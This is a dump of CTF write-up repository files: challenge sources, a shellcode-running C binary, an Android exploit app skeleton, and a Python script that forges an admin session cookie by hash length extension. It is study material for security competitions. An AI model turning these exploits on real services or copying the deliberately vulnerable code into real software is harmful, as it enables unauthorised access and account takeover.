-------------------------------------------------------------------------------- /hack-a-sat-23/pwn/dROP-Baby/src/server.ini: -------------------------------------------------------------------------------- 1 | hidden/server.ini -------------------------------------------------------------------------------- /insomnihack2022/PimpMyVariant/resources/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/PimpMyVariant/resources/home.png -------------------------------------------------------------------------------- /insomnihack2022/herald/Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk -------------------------------------------------------------------------------- /insomnihack2022/herald/resources/app-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/resources/app-flag.png -------------------------------------------------------------------------------- /insomnihack2022/herald/resources/app-running.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2022/herald/resources/app-running.png -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/README.md: -------------------------------------------------------------------------------- 1 | # CryptoNotes 2 | 3 | Categories: pwn, Android 4 | 5 | Description: 6 | > Insomni'Hack Teaser 2024 - CryptoNotes 7 | > 8 | > System Running: 9 | > 10 | > `system-images;android-30;google_apis_playstore;x86_64` 11 | > 12 | > author: dai 13 | > 14 | > [vuln.apk](./resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk) 15 | 16 | **Tags:** pwn, Android, Intent, deserialization, stack buffer overflow 17 | 18 | The writeup for this challenge can be found in [chalkiadakis.me/posts/insomnihack-teaser24/cryptonotes](https://chalkiadakis.me/posts/insomnihack-teaser24/cryptonotes/). The PoC can be found in the [solution/](solution) directory. 19 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/insomnihack2024/CryptoNotes/resources/app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/.gitignore: -------------------------------------------------------------------------------- 1 | *.iml 2 | .gradle 3 | /local.properties 4 | /.idea/caches 5 | /.idea/libraries 6 | /.idea/modules.xml 7 | /.idea/workspace.xml 8 | /.idea/navEditor.xml 9 | /.idea/assetWizardSettings.xml 10 | .DS_Store 11 | /build 12 | /captures 13 | .externalNativeBuild 14 | .cxx 15 | local.properties 16 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Sets the minimum version of CMake required to build your native library. 2 | # This ensures that a certain set of CMake features is available to 3 | # your build. 4 | 5 | cmake_minimum_required(VERSION 3.4.1) 6 | 7 | set(CMAKE_BUILD_TYPE RelWithDebInfo) 8 | 9 | # Specifies a library name, specifies whether the library is STATIC or 10 | # SHARED, and provides relative paths to the source code. You can 11 | # define multiple libraries by adding multiple add_library() commands, 12 | # and CMake builds them for you. When you build your app, Gradle 13 | # automatically packages shared libraries with your APK. 14 | 15 | find_library( # Defines the name of the path variable that stores the 16 | # location of the NDK library. 17 | log-lib 18 | 19 | # Specifies the name of the NDK library that 20 | # CMake needs to locate. 21 | log ) 22 | 23 | add_library(mynativelib SHARED app/src/main/cpp/main.cpp) 24 | 25 | target_link_libraries( # Specifies the target library. 26 | mynativelib 27 | # Links the log library to the target library. 28 | ${log-lib} ) -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'com.android.application' 3 | id 'org.jetbrains.kotlin.android' 4 | } 5 | 6 | android { 7 | compileSdk 32 8 | 9 | defaultConfig { 10 | applicationId "com.example.insomnipwn" 11 | minSdk 29 12 | targetSdk 32 13 | versionCode 1 14 | versionName "1.0" 15 | 16 | testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner" 17 | externalNativeBuild { 18 | cmake { 19 | cppFlags '' 20 | } 21 | } 22 | } 23 | 24 | buildTypes { 25 | release { 26 | minifyEnabled false 27 | proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro' 28 | } 29 | } 30 | compileOptions { 31 | sourceCompatibility JavaVersion.VERSION_1_8 32 | targetCompatibility JavaVersion.VERSION_1_8 33 | } 34 | kotlinOptions { 35 | jvmTarget = '1.8' 36 | } 37 | externalNativeBuild { 38 | cmake { 39 | path file('../CMakeLists.txt') 40 | version '3.18.1' 41 | } 42 | } 43 | } 44 | 45 | dependencies { 46 | 47 | implementation 'com.google.code.gson:gson:2.8.9' 48 | implementation 'androidx.core:core-ktx:1.7.0' 49 | implementation 'androidx.appcompat:appcompat:1.5.0' 50 | implementation 'com.google.android.material:material:1.6.1' 51 | implementation 'androidx.constraintlayout:constraintlayout:2.1.4' 52 | testImplementation 'junit:junit:4.13.2' 53 | androidTestImplementation 'androidx.test.ext:junit:1.1.3' 54 | androidTestImplementation 'androidx.test.espresso:espresso-core:3.4.0' 55 | } -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 21 | #-renamesourcefileattribute SourceFile -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 17 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/cpp/mylogger.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ifndef MY_APPLICATION_MYLOGGER_H 4 | #define MY_APPLICATION_MYLOGGER_H 5 | 6 | #include 7 | 8 | #define ALOGV(...) __android_log_print(ANDROID_LOG_VERBOSE, LOG_TAG, __VA_ARGS__) 9 | #define ALOGD(...) __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, __VA_ARGS__) 10 | #define ALOGI(...) __android_log_print(ANDROID_LOG_INFO, LOG_TAG, __VA_ARGS__) 11 | #define ALOGW(...) __android_log_print(ANDROID_LOG_WARN, LOG_TAG, __VA_ARGS__) 12 | #define ALOGE(...) __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, __VA_ARGS__) 13 | 14 | #endif //MY_APPLICATION_MYLOGGER_H 15 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/java/com/inso/ins24/utils/CryptoConfig.java: -------------------------------------------------------------------------------- 1 | //Extracted from the target application via JADX 2 | package com.inso.ins24.utils; 3 | 4 | public class CryptoConfig { 5 | private byte[] ALGO; 6 | private String IN; 7 | 8 | public CryptoConfig(byte[] algo, String in) { 9 | this.ALGO = algo; 10 | this.IN = in; 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/java/com/inso/ins24/utils/JSONBuilder.java: -------------------------------------------------------------------------------- 1 | //Extracted from the target application via JADX 2 | package com.inso.ins24.utils; 3 | 4 | import android.os.Parcel; 5 | import android.os.Parcelable; 6 | 7 | import com.google.gson.Gson; 8 | import com.google.gson.GsonBuilder; 9 | 10 | public class JSONBuilder implements Parcelable { 11 | public static final Parcelable.Creator CREATOR = new Parcelable.Creator() { 12 | @Override // android.os.Parcelable.Creator 13 | public JSONBuilder[] newArray(int i) { 14 | return new JSONBuilder[i]; 15 | } 16 | @Override // android.os.Parcelable.Creator 17 | public JSONBuilder createFromParcel(Parcel parcel) { 18 | return new JSONBuilder(parcel); 19 | } 20 | }; 21 | private static final Gson JSON = new GsonBuilder().create(); 22 | public Object data; 23 | 24 | public JSONBuilder(Object data) { 25 | this.data = data; 26 | } 27 | 28 | private JSONBuilder(Parcel parcel) { 29 | try { 30 | this.data = JSON.fromJson(parcel.readString(), (Class) Class.forName(parcel.readString())); 31 | } catch (ClassNotFoundException e) { 32 | throw new RuntimeException(e); 33 | } 34 | } 35 | 36 | @Override // android.os.Parcelable 37 | public int describeContents() { 38 | return 0; 39 | } 40 | 41 | @Override // android.os.Parcelable 42 | public void writeToParcel(Parcel parcel, int i) { 43 | parcel.writeString(this.data.getClass().getCanonicalName()); 44 | parcel.writeString(JSON.toJson(this.data)); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/res/drawable-v24/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /insomnihack2024/CryptoNotes/solution/MaliciousApp/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 18 | 19 | 40 | 41 | 42 | 43 |

44 | 45 | 46 | 47 | 48 | {% endautoescape %} 49 | {% endblock %} -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block content %} 3 | 4 | {% endblock %} -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/app/templates/post.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} 2 | 3 | 4 | {% block add_post %} 5 |
6 |
7 | 8 | 9 |

Write your post

10 | 11 |
12 | {{ form.hidden_tag() }} 13 |

14 |
15 |
16 |

17 |
18 | 21 |
22 |
23 |
24 | 25 | 26 | 27 | {% endblock %} 28 | 29 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/config.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | basedir = os.path.abspath(os.path.dirname(__file__)) 4 | 5 | 6 | class Config(object): 7 | SECRET_KEY = os.environ.get("SECRET_KEY") or os.urandom(32) 8 | SQLALCHEMY_DATABASE_URI = os.environ.get( 9 | "DATABASE_URL" 10 | ) or "sqlite:///" + os.path.join(basedir, "db", "app.db") 11 | SQLALCHEMY_TRACK_MODIFICATIONS = False 12 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/db/app.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/dumbforum-src/db/app.db -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "2.2" 2 | services: 3 | web: 4 | build: . 5 | ports: 6 | - 127.0.0.1:8090:8090 7 | -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/main.py: -------------------------------------------------------------------------------- 1 | from app import app, db 2 | from app.models import User, Post 3 | import logging 4 | 5 | 6 | if __name__ == "__main__": 7 | from waitress import serve 8 | logger = logging.getLogger('waitress') 9 | logger.setLevel(logging.INFO) 10 | serve(app, host="0.0.0.0", port=8090) -------------------------------------------------------------------------------- /m0lecon22/dumbforum/dumbforum-src/requirements.txt: -------------------------------------------------------------------------------- 1 | alembic 2 | click 3 | dnspython 4 | email-validator 5 | Flask 6 | Flask-Login 7 | Flask-Migrate 8 | Flask-SQLAlchemy 9 | Flask-WTF 10 | greenlet 11 | idna 12 | itsdangerous 13 | Jinja2 14 | Mako 15 | MarkupSafe 16 | python-dateutil 17 | python-dotenv 18 | python-editor 19 | six 20 | SQLAlchemy 21 | Werkzeug~=2.0.0 22 | WTForms 23 | flask-bootstrap 24 | waitress -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/detour-xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/detour-xss.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/flag.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/index.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/invalid-email.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/invalid-email.png -------------------------------------------------------------------------------- /m0lecon22/dumbforum/writeup-resources/register-malicious.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/dumbforum/writeup-resources/register-malicious.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-slim 2 | 3 | WORKDIR /app 4 | 5 | COPY requirements.txt /requirements.txt 6 | RUN pip3 install -r /requirements.txt 7 | 8 | COPY app/ /app/ 9 | 10 | RUN mkdir /tmp/uploads 11 | RUN mkdir -p /app/logs/ 12 | 13 | CMD gunicorn -w 4 -b 0.0.0.0:5000 --log-level DEBUG --chdir / --timeout 10 "app:create_app()" -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import logging 4 | from time import sleep 5 | from flask import Flask 6 | from .db import db 7 | from .routes import init_routes 8 | from .models import * 9 | from .utils import init_db 10 | 11 | 12 | def create_app(test_config=None): 13 | app = Flask(__name__, instance_relative_config=True) 14 | app.logger.setLevel(logging.DEBUG) 15 | app.config.from_mapping( 16 | SECRET_KEY='dev', 17 | SQLALCHEMY_DATABASE_URI='sqlite:////tmp/test.db', 18 | ) 19 | app.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 20 | 21 | if os.environ.get("DOCKER"): 22 | PASS = os.environ.get("MYSQL_ROOT_PASSWORD") 23 | DB = os.environ.get("MYSQL_DATABASE") 24 | app.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://root:{PASS}@db/{DB}?charset=utf8mb4' 25 | else: 26 | app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db' 27 | 28 | if test_config is None: 29 | app.config.from_pyfile('config.py', silent=True) 30 | else: 31 | app.config.from_mapping(test_config) 32 | 33 | try: 34 | os.makedirs(app.instance_path) 35 | except OSError: 36 | pass 37 | 38 | db.init_app(app) 39 | with app.app_context(): 40 | # Connect to database 41 | tries = 10 42 | while tries > 0: 43 | try: 44 | db.create_all() 45 | tries = 0 46 | except: 47 | tries += -1 48 | print('Failed to connect to database. Waiting and then trying again (try countdown: %s)' % tries) 49 | sleep(5) 50 | init_db(db) 51 | 52 | app.logger.debug('Hello World!') 53 | init_routes(app) 54 | 55 | return app 56 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/db.py: -------------------------------------------------------------------------------- 1 | from flask_sqlalchemy import SQLAlchemy 2 | 3 | db = SQLAlchemy() 4 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/models.py: -------------------------------------------------------------------------------- 1 | from .db import db 2 | 3 | 4 | class User(db.Model): 5 | id = db.Column(db.Integer, primary_key=True) 6 | username = db.Column(db.String(80), unique=True, nullable=False) 7 | password = db.Column(db.String(256), nullable=False) 8 | locale = db.Column(db.String(3), nullable=False) 9 | 10 | def __repr__(self): 11 | return '' % self.username 12 | 13 | 14 | class Note(db.Model): 15 | id = db.Column(db.Integer, primary_key=True) 16 | title = db.Column(db.String(80), nullable=False) 17 | body = db.Column(db.Text, nullable=False) 18 | picture_id = db.Column(db.String(255), nullable=True) 19 | 20 | user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False) 21 | user = db.relationship('User', backref=db.backref('notes', lazy=True)) 22 | 23 | def __repr__(self): 24 | return '' % self.title 25 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/static/chao.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/fancynotes-src/app/static/chao.gif -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {% block title %}Fancy notes{% endblock %} 6 | 12 | 18 | 19 | 20 |
{% block content %} {% endblock %}
21 | 22 | {% block script %} {% endblock %} 23 | 24 | 25 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes{% endblock %} {% block 2 | content %} 3 |
4 |

Hello!

5 |

Welcome to fancy notes

6 |
7 | Log In 8 |
9 |
10 | 11 | Registration 12 | 13 |
14 |
15 | {% endblock %} 16 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes - Log in{% endblock 2 | %} {% block content %} 3 |
4 |
5 |
6 |

Log in

7 | 8 | {% if error %} 9 | 10 | {% endif %} 11 | 12 |
13 |
14 | 15 | 21 |
22 |
23 | 24 | 30 |
31 | 32 |
33 | 34 |
35 |

Don't have an account?

36 | Register 37 |
38 |
39 |
40 |
41 | {% endblock %} 42 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/templates/registration.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} {% block title %}Fancy notes - Registration{% endblock 2 | %} {% block content %} 3 |
4 |
5 |
6 |

Registration

7 | 8 | {% if error %} 9 | 10 | {% endif %} 11 | 12 |
13 |
14 | 15 | 21 |
22 |
23 | 24 | 30 |
31 | 32 |
33 | 34 |
35 |

Already have an account?

36 | Log In 37 |
38 |
39 |
40 |
41 | {% endblock %} 42 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/app/validators.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | 4 | def validate_registration(form_data): 5 | if not form_data['username'] or not form_data['password']: 6 | return 'missing parameter' 7 | if not re.match(r'^[a-zA-Z0-9-_$]+$', form_data['username']): 8 | return 'do you have special characters in your name??' 9 | if len(form_data['username']) > 30: 10 | return 'username too long' 11 | if len(form_data['username']) < 4: 12 | return 'username too short' 13 | if len(form_data['password']) > 30: 14 | return 'password too long' 15 | if len(form_data['password']) < 4: 16 | return 'password too short' 17 | return None 18 | 19 | 20 | def validate_login(form_data): 21 | if not form_data['username'] or not form_data['password']: 22 | return 'missing parameter' 23 | 24 | 25 | def validate_note(form_data): 26 | if not form_data['title'] or not form_data['body']: 27 | return 'missing parameter' 28 | if len(form_data['title']) > 80: 29 | return 'title too long' 30 | if len(form_data['title']) < 1: 31 | return 'title too short' 32 | if len(form_data['body']) > 200: 33 | return 'body too long' 34 | if len(form_data['body']) < 1: 35 | return 'body too short' 36 | return None 37 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | 3 | services: 4 | app: 5 | build: . 6 | ports: 7 | - 5000:5000 8 | depends_on: 9 | - db 10 | restart: always 11 | environment: 12 | - DOCKER=true 13 | - SECRET_KEY=arandomkey 14 | - FLAG=ptm{pleaseD0NOTUseCr3am1nCarbon4r4!} 15 | - MYSQL_ROOT_PASSWORD=arandompassword 16 | - MYSQL_DATABASE=challenge 17 | 18 | db: 19 | image: mariadb:10.8 20 | restart: always 21 | environment: 22 | - MYSQL_ROOT_PASSWORD=arandompassword 23 | - MYSQL_DATABASE=challenge 24 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/fancynotes-src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | Flask-SQLAlchemy 3 | pymysql 4 | gunicorn -------------------------------------------------------------------------------- /m0lecon22/fancynotes/solution.py: -------------------------------------------------------------------------------- 1 | 2 | import hashpumpy 3 | import base64 4 | import requests 5 | import urllib3 6 | import re 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxyDict = { 10 | "http" : 'http://127.0.0.1:8080', 11 | "https" : 'http://127.0.0.1:8080', 12 | } 13 | 14 | # Attacker knows: Hash(message1) and length of message1 15 | # Attacker controlls message2 16 | # Attacker calculates Hash(message1 ‖ message2) 17 | 18 | # cookie from remote 19 | cookie = 'dXNlcm5hbWU9ZmFuZSxsb2NhbGU9ZW58Yjg0ZTkxZmU4ZDNmOTkyYmFlYWQ1OGRhODEzYjg0ZjNmYjcxZDg4MzI3ZTEzNDVjY2QwMWRkNmIyODQwYTI2YQ==' 20 | cookie = base64.b64decode(cookie).decode('ascii') 21 | 22 | user_string, signature_str = cookie.split('|') 23 | Hmessage1 = signature_str 24 | message1_length = 1 25 | 26 | message2 = ',username=admin' 27 | while message1_length < 40: 28 | new_signature, new_msg = hashpumpy.hashpump(signature_str, user_string, message2, message1_length) 29 | 30 | new_cookie = new_msg + b'|' + bytes(new_signature, encoding='utf-8') 31 | print(new_cookie) 32 | new_cookie = base64.b64encode(new_cookie).decode('ascii') 33 | print(new_cookie) 34 | 35 | s = requests.Session() 36 | cookie_obj = requests.cookies.create_cookie( 37 | name="user", value=new_cookie 38 | ) 39 | s.cookies.set_cookie(cookie_obj) 40 | 41 | host = '127.0.0.1:5000' 42 | base_url = 'http://'+host 43 | r = s.get(base_url+'/notes', proxies=proxyDict, verify=False, allow_redirects=False) 44 | print(r.text) 45 | if 'admin' in r.text: 46 | flag = re.search(r'ptm{.+}', r.text).group(0) 47 | break 48 | 49 | message1_length += 1 50 | print(message1_length) 51 | print(new_cookie) 52 | print("Flag: " + flag) 53 | 54 | # ptm{pleaseD0NOTUseCr3am1nCarbon4r4!} 55 | -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/create-note.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/create-note.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/index.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/login.png -------------------------------------------------------------------------------- /m0lecon22/fancynotes/writeup-resources/notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/m0lecon22/fancynotes/writeup-resources/notes.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/resources/sample-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/resources/sample-run.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/resources/solution-txt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/resources/solution-txt.png -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/scaas.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned int scaas() { 5 | void *v0; // esp 6 | int v4; // [esp+0h] [ebp-28h] BYREF 7 | int n; // [esp+8h] [ebp-20h] 8 | int v6; // [esp+Ch] [ebp-1Ch] 9 | char *s; // [esp+10h] [ebp-18h] 10 | void *code; // [esp+14h] [ebp-14h] 11 | void *v9; // [esp+18h] [ebp-10h] 12 | unsigned int v10; // [esp+1Ch] [ebp-Ch] 13 | 14 | v10 = __readgsdword(0x14u); 15 | n = 500; 16 | v6 = 499; 17 | v0 = alloca(512); 18 | STACK[0x1FC] = STACK[0x1FC]; 19 | char *buf = (char *)&v4; 20 | printf("Run SCAAS (alphanumeric shellcode, max 500 bytes): "); 21 | 22 | //Reading stops after an EOF or a newline. 23 | fgets(buf, n, stdin); 24 | buf[strcspn(buf, "\n")] = '\0'; // NULL terminator 25 | 26 | if ( is_alphanumeric(buf) != 1 ) { 27 | puts("Error: shellcode must be alphanumeric"); 28 | } else { 29 | code = mmap( 30 | NULL, n, 31 | PROT_READ | PROT_WRITE| PROT_EXEC, 32 | MAP_PRIVATE | MAP_ANONYMOUS, 33 | -1, 0 34 | ); 35 | if ( code == (void *)-1 ) { 36 | perror("mmap"); 37 | } else { 38 | memcpy(code, buf, strlen(buf)); 39 | v9 = code; 40 | ( (void (*)(void))code )(); //invoke shellcode 41 | } 42 | } 43 | return v10 - __readgsdword(0x14u); 44 | } 45 | 46 | int is_alphanumeric(char *str) { 47 | char *cptr = str; 48 | while(1) { 49 | char c = *cptr; 50 | if (c == 0) 51 | return 1; //success 52 | 53 | ushort **ppuVar1 = __ctype_b_loc(); //https://stackoverflow.com/questions/37702434/ctype-b-loc-what-is-its-purpose 54 | if ( ((*ppuVar1)[c] & 8) == 0) 55 | return 0; 56 | ++cptr; 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /midnight-quals-23/pwn/scaas/src/scaas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/pwn/scaas/src/scaas -------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/resources/xref-puts-O0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/rev/oss/resources/xref-puts-O0.png -------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/resources/xref-puts-O2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-23/rev/oss/resources/xref-puts-O2.png -------------------------------------------------------------------------------- /midnight-quals-23/rev/oss/solution/Makefile: -------------------------------------------------------------------------------- 1 | 2 | 3 | all: oss.angr.O0 oss.angr.O2 4 | 5 | oss.angr.O0: oss.angr.c 6 | gcc -O0 -g -o oss.angr.O0 oss.angr.c -no-pie 7 | 8 | oss.angr.O2: oss.angr.c 9 | gcc -O2 -g -o oss.angr.O2 oss.angr.c -no-pie 10 | 11 | clean: 12 | rm -f oss.angr.O0 oss.angr.O2 13 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CC=gcc 3 | CFLAGS=-g -O0 4 | 5 | .PHONY: all 6 | all: dummy 7 | 8 | dummy: dummy.c 9 | $(CC) $(CFLAGS) -o $@ $^ 10 | 11 | clean: 12 | rm -rf *.o dummy 13 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/brutter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | while : 4 | do 5 | python solution.py "$@" 6 | if [ $? -eq 0 ]; then 7 | break 8 | fi 9 | done 10 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/dummy.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef void (*srand_t)(unsigned int __seed); 9 | typedef int (*rand_t)(void); 10 | 11 | int main(int argc, char * argv[]) { 12 | if (argc != 2) { 13 | printf("Invalid arguments\n"); 14 | return 1; 15 | } 16 | int seed = atoi(argv[1]); 17 | int *addr = mmap(NULL, 0x10000000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS , -1, 0); 18 | if(!addr) 19 | perror("mmap"); 20 | printf("%p\n", addr); 21 | 22 | void *libc_handle = dlopen("./libc.so.6", RTLD_LAZY); 23 | if(!libc_handle) { 24 | printf("dlopen: %s\n", dlerror()); 25 | return 1; 26 